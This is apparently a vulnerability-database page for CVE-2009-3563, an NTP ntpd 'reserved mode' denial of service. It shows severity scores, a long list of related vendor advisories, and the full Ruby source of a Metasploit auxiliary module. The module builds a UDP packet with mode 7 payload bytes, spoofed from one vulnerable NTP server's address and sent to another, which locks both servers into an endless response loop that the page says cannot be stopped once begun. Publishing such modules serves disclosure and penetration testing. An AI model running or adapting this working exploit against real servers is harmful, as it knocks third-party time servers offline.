Lucene search
HistoryDec 13, 2009 - 2:56 a.m.
NTP.org ntpd Reserved Mode Denial of Service
CVSS2
6.4
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:P/A:P
EPSS
0.966
Percentile
99.7%
This module exploits a denial of service vulnerability within the NTP (network time protocol) demon. By sending a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun!
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'NTP.org ntpd Reserved Mode Denial of Service',
'Description' => %q{
This module exploits a denial of service vulnerability
within the NTP (network time protocol) demon. By sending
a single packet to a vulnerable ntpd server (Victim A),
spoofed from the IP address of another vulnerable ntpd server
(Victim B), both victims will enter an infinite response loop.
Note, unless you control the spoofed source host or the real
remote host(s), you will not be able to halt the DoS condition
once begun!
},
'Author' => [ 'todb' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '37255' ],
[ 'CVE', '2009-3563' ],
[ 'OSVDB', '60847' ],
[ 'URL', 'https://bugs.ntp.org/show_bug.cgi?id=1331' ]
],
'DisclosureDate' => '2009-10-04'))
register_options(
[
OptAddressLocal.new('LHOST', [true, "The spoofed address of a vulnerable ntpd server" ])
])
deregister_options('FILTER','PCAPFILE')
end
def run_host(ip)
open_pcap
print_status("Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}")
p = PacketFu::UDPPacket.new
p.ip_saddr = datastore['LHOST']
p.ip_daddr = ip
p.ip_ttl = 255
p.udp_src = 123
p.udp_dst = 123
p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)]
p.recalc
capture_sendto(p,ip)
close_pcap
end
end
Related
openvas
openvas
CentOS Security Advisory CESA-2009:1648 (ntp)
2009-12-14 00:00:00
Slackware Advisory SSA:2009-343-01 ntp
2012-09-11 00:00:00
Gentoo Security Advisory GLSA 201001-01 (ntp)
2010-01-07 00:00:00
f5
f5
K10905 : NTP vulnerability - CVE-2009-3563
2013-07-05 00:00:00
SOL10905 - NTP vulnerability - CVE-2009-3563
2010-01-04 00:00:00
K000139026 : NTP vulnerability CVE-2009-3563
2024-03-25 00:00:00
redhat
redhat
(RHSA-2009:1648) Moderate: ntp security update
2009-12-08 00:00:00
(RHSA-2009:1651) Moderate: ntp security update
2009-12-08 00:00:00
(RHSA-2010:0095) Important: rhev-hypervisor security and bug fix update
2010-02-09 00:00:00
nessus
nessus
AIX 6.1 TL 2 : xntpd (IZ71613)
2013-01-24 00:00:00
Solaris 10 (sparc) : 143725-01
2018-03-12 00:00:00
AIX 6.1 TL 4 : xntpd (IZ71071)
2013-01-24 00:00:00
securityvulns
securityvulns
ntp server DoS
2009-12-09 00:00:00
[USN-867-1] Ntp vulnerability
2009-12-09 00:00:00
[SECURITY] [DSA 1992-1] New chrony packages fix denial of service
2010-02-05 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:42:01
debian
debian
[SECURITY] [DSA 1948-1] New ntp packages fix denial of service
2009-12-08 19:07:15
[SECURITY] [DSA 1992-1] New chrony packages fix denial of service
2010-02-04 17:38:45
packetstorm
packetstorm
NTP.org ntpd Reserved Mode Denial of Service
2024-08-31 00:00:00
cvelist
cvelist
CVE-2009-3563
2009-12-09 00:00:00
CVE-2010-0292
2022-10-03 16:21:10
gentoo
gentoo
NTP: Denial of service
2010-01-03 00:00:00
seebug
seebug
NTP MODE_PRIVATEζ₯ζθΏη¨ζη»ζε‘ζΌζ΄
2009-12-12 00:00:00
cert
cert
NTP mode 7 denial-of-service vulnerability
2009-12-08 00:00:00
freebsd_advisory
freebsd_advisory
FreeBSD-SA-10:02.ntpd
2010-01-06 00:00:00
cisco
cisco
slackware
slackware
[slackware-security] ntp
2009-12-10 08:39:43
checkpoint_advisories
checkpoint_advisories
Multiple Vendors NTP Mode 7 Denial of Service (CVE-2009-3563)
2010-02-02 00:00:00
Update Protection against Multiple Vendors NTP Mode 7 Denial of Service
2009-01-25 00:00:00
oraclelinux
oraclelinux
ntp security update
2009-12-08 00:00:00
ntp security update
2009-12-08 00:00:00
cve
cve
CVE-2009-3563
2009-12-09 18:30:00
CVE-2010-0292
2022-10-03 16:21:10
nvd
nvd
CVE-2009-3563
2009-12-09 18:30:00
CVE-2010-0292
2010-02-08 20:30:00
ubuntu
ubuntu
Ntp vulnerability
2009-12-08 00:00:00
centos
centos
ntp security update
2009-12-08 22:33:14
ntp security update
2009-12-08 22:18:02
ubuntucve
ubuntucve
CVE-2009-3563
2009-12-08 00:00:00
CVE-2010-0292
2010-02-08 00:00:00
debiancve
debiancve
CVE-2009-3563
2009-12-09 18:30:00
CVE-2010-0292
2022-10-03 16:21:10
prion
prion
Code injection
2009-12-09 18:30:00
Sql injection
2010-02-08 20:30:00
fedora
fedora
[SECURITY] Fedora 12 Update: ntp-4.2.4p8-1.fc12
2009-12-11 18:14:28
[SECURITY] Fedora 11 Update: ntp-4.2.4p7-3.fc11
2009-12-11 18:23:49
[SECURITY] Fedora 10 Update: ntp-4.2.4p7-2.fc10
2009-12-11 18:32:53
redhatcve
redhatcve
CVE-2024-2169
2024-04-02 20:21:52
osv
osv
chrony - denial of service
2010-02-04 00:00:00
vmware
vmware
ESX Service Console and vMA third party updates
2010-03-03 00:00:00
ESX Service Console and vMA third party updates
2010-03-03 00:00:00
ESXi utilities and ESX Service Console third party updates
2010-05-27 00:00:00
CVSS2
6.4
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:P/A:P
EPSS
0.966
Percentile
99.7%
Related for MSF:AUXILIARY-DOS-NTP-NTPD_RESERVED_DOS-